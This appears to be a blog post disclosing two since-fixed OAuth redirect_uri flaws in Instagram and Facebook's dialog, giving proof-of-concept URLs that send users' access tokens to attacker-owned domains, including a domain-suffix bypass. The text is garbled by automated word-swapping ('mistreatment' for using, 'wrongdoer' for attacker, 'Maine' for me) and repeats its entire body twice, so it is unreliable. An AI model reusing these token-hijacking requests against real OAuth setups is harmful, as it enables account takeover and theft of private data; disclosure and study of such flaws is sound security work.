Nir Goldshlager founding father of Break Security notice the important vulnerability in Instagram. Succesful hack permits wrongdoer to access personal photos and talent to delete victim's photos, edit comment and post new photos.
1. Hijack Instagram accounts mistreatment the Instagram OAuth (https://instagram.com/oauth/authorize/)
2. Hijack Instagram accounts mistreatment the Facebook OAuth Dialog (https://www.facebook.com/dialog/oauth)
He reported a couple of problems to Instagram embody OAuth Attacks, however the acquisition didn’t closed nevertheless and Facebook Security was unable to place their hands on security problems in Instagram, therefore i used to be waiting, Waiting sort of a smart WhiteCollar, Then Facebook Security send Maine a message, they assert even that they was unable to mend this problems as a result of the acquisition didn’t closed nevertheless, they're going to still payout for this vulnerabilities,
So, first, checked Instagram’s OAuth protocol: (http://instagram.com/developer/authentication/)
While researching Instagram’s security parameters, Nir noticed that Facebook Security had made some spectacular ends up in relation to their own Instagram OAuth vulnerabilities. They basically blocked access to any and every one files, folders, and subdomains by validate the redirect_uri parameter.
In addition, redirection was solely allowed to travel to the owner app domain.
Thus, hacker required to find another thanks to get past their protection. more complicating the problem was the actual fact that you just can’t use a web site redirection / XSS on the victim’s owner app. this can be as a result of you've got no access to the files or folders on the owner app domain through the redirect_uri parameter.
Block Files Folders
For example:
Allow request:
https://apigee.com
Block requests:
Redirect_uri=https://www.breaksec.com
Redirect_uri=https://a.apigee.com/
Redirect_uri=https://apigee.com/x/x.php
Redirect_uri=https://apigee.com/%23,? or any special sign
As it stands, it seems that the redirect_uri is inviolable to OAuth attacks.
While researching, I chanced on a sneaky bypass. If the wrongdoer uses a suffix trick on the owner app domain, they will bypass the Instagram OAuth so send the access_token code to their own domain.
For instance:
Let’s say Nir app client_id in Instagram is 33221863xxx and my domain is breaksec.com
In this case, the redirect_uri parameter ought to permit redirection solely to my domain (breaksec.com), right? What happens once we modification the suffix within the domain to one thing like:
Breaksec.com.mx
In this example, the wrongdoer will send the access_token, code straight to breaksec.com.mx. For the attack to achieve success, of course, the wrongdoer can got to purchase the new domain (in this case, breaksec.com.mx).
PoC Bypass (Fixed By Facebook Security Team):
https://instagram.com/oauth/authorize/?client_id=33221863eec546659f2564dd71a8a38d&redirect_uri=https://breaksec.com.mx&response_type=token
Game Over.
Bug 2.
With this bug, Nir used the Instagram client_id worth through the Facebook OAuth (https://www.facebook.com/dialog/oauth).
When you use the Instagram app, it may be integrated with Facebook.
For example:
When a user needs to transfer their Instagram photos to Facebook, they permit this interaction and integration to require place.
Instagram would love to access your public profile and friend list
Nir discovered that associate degree wrongdoer will use just about any domain within the redirect_uri, next parameter. This was really variety of problematic, and that i don’t recognize why this happened, however it worked. you'll virtually use any domain in redirect_uri, next parameter via the redirect_uri in Instagram client_id.
This effectively permits the wrongdoer to steal the access_token of any Instagram user,
With the access_token the wrongdoer are going to be ready to post on the victim behalf in his Facebook account, Access to his personal friends list.
PoC (Facebook Already mounted this issue):
https://www.facebook.com/connect/uiserver.php?app_id=124024574287414&next=http://files.nirgoldshlager.com&display=page&fbconnect=1&method=permissions.request&response_type=token
1. Hijack Instagram accounts mistreatment the Instagram OAuth (https://instagram.com/oauth/authorize/)
2. Hijack Instagram accounts mistreatment the Facebook OAuth Dialog (https://www.facebook.com/dialog/oauth)
He reported a couple of problems to Instagram embody OAuth Attacks, however the acquisition didn’t closed nevertheless and Facebook Security was unable to place their hands on security problems in Instagram, therefore i used to be waiting, Waiting sort of a smart WhiteCollar, Then Facebook Security send Maine a message, they assert even that they was unable to mend this problems as a result of the acquisition didn’t closed nevertheless, they're going to still payout for this vulnerabilities,
So, first, checked Instagram’s OAuth protocol: (http://instagram.com/developer/authentication/)
While researching Instagram’s security parameters, Nir noticed that Facebook Security had made some spectacular ends up in relation to their own Instagram OAuth vulnerabilities. They basically blocked access to any and every one files, folders, and subdomains by validate the redirect_uri parameter.
In addition, redirection was solely allowed to travel to the owner app domain.
Thus, hacker required to find another thanks to get past their protection. more complicating the problem was the actual fact that you just can’t use a web site redirection / XSS on the victim’s owner app. this can be as a result of you've got no access to the files or folders on the owner app domain through the redirect_uri parameter.
Block Files Folders
For example:
Allow request:
https://apigee.com
Block requests:
Redirect_uri=https://www.breaksec.com
Redirect_uri=https://a.apigee.com/
Redirect_uri=https://apigee.com/x/x.php
Redirect_uri=https://apigee.com/%23,? or any special sign
As it stands, it seems that the redirect_uri is inviolable to OAuth attacks.
While researching, I chanced on a sneaky bypass. If the wrongdoer uses a suffix trick on the owner app domain, they will bypass the Instagram OAuth so send the access_token code to their own domain.
For instance:
Let’s say Nir app client_id in Instagram is 33221863xxx and my domain is breaksec.com
In this case, the redirect_uri parameter ought to permit redirection solely to my domain (breaksec.com), right? What happens once we modification the suffix within the domain to one thing like:
Breaksec.com.mx
In this example, the wrongdoer will send the access_token, code straight to breaksec.com.mx. For the attack to achieve success, of course, the wrongdoer can got to purchase the new domain (in this case, breaksec.com.mx).
PoC Bypass (Fixed By Facebook Security Team):
https://instagram.com/oauth/authorize/?client_id=33221863eec546659f2564dd71a8a38d&redirect_uri=https://breaksec.com.mx&response_type=token
Game Over.
Bug 2.
With this bug, Nir used the Instagram client_id worth through the Facebook OAuth (https://www.facebook.com/dialog/oauth).
When you use the Instagram app, it may be integrated with Facebook.
For example:
When a user needs to transfer their Instagram photos to Facebook, they permit this interaction and integration to require place.
Instagram would love to access your public profile and friend list
Nir discovered that associate degree wrongdoer will use just about any domain within the redirect_uri, next parameter. This was really variety of problematic, and that i don’t recognize why this happened, however it worked. you'll virtually use any domain in redirect_uri, next parameter via the redirect_uri in Instagram client_id.
This effectively permits the wrongdoer to steal the access_token of any Instagram user,
With the access_token the wrongdoer are going to be ready to post on the victim behalf in his Facebook account, Access to his personal friends list.
PoC (Facebook Already mounted this issue):
https://www.facebook.com/connect/uiserver.php?app_id=124024574287414&next=http://files.nirgoldshlager.com&display=page&fbconnect=1&method=permissions.request&response_type=token
No comments :
Post a Comment